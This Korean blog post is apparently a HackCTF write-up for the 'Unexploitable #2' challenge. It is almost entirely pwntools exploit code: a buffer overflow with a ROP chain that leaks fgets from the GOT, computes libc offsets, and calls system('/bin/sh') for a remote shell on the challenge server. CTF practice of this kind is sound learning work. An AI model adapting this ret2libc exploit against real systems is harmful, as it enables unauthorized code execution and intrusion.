ii4gsp
HackCTF - Unexploitable #2 본문
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3029)
e = ELF('./Unexploitable_2')
context.log_level = 'debug'
payload = ''
payload += '\x90' * 0x18
payload += p64(0x0000000000400773)
payload += p64(e.got['fgets'])
payload += p64(e.plt['system'])
payload += p64(0x40068c)
r.sendlineafter('\n', payload)
r.recvuntil('1: ')
leak = u64(r.recv(6) + '\x00\x00')
log.info('leak : ' + hex(leak))fgets() Leak
fgets() 하위 바이트 0x5ad0
system_offset = 0x45390
fgets_offset = 0x6dad0
"/bin/sh"_offset = 0x18cd57
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3029)
e = ELF('./Unexploitable_2')
context.log_level = 'debug'
system_offset = 0x045390
fgets_offset = 0x06dad0
binsh_offset = 0x18cd57
payload = ''
payload += '\x90' * 0x18
payload += p64(0x0000000000400773)
payload += p64(e.got['fgets'])
payload += p64(e.plt['system'])
payload += p64(0x40068c)
r.sendlineafter('\n', payload)
r.recvuntil('1: ')
leak = u64(r.recv(6) + '\x00\x00')
libc_base = leak - fgets_offset
system = libc_base + system_offset
binsh = libc_base + binsh_offset
log.info('libc_base : ' + hex(libc_base))
log.info('system : ' + hex(system))
log.info('binsh : ' + hex(binsh))
payload = ''
payload += '\x90' * 0x18
payload += p64(0x0000000000400773)
payload += p64(binsh)
payload += p64(system)
r.sendlineafter('\n', payload)
r.interactive()Exploit
'시스템 해킹 > HackCTF' 카테고리의 다른 글
| HackCTF - Register (0) | 2020.11.27 |
|---|---|
| HackCTF - RTC (0) | 2020.05.05 |
| HackCTF - SysROP (0) | 2020.05.05 |
| HackCTF - Unexploitable #1 (0) | 2020.05.05 |
| HackCTF - You are silver (0) | 2020.03.05 |
'시스템 해킹/HackCTF' Related Articles
more
Comments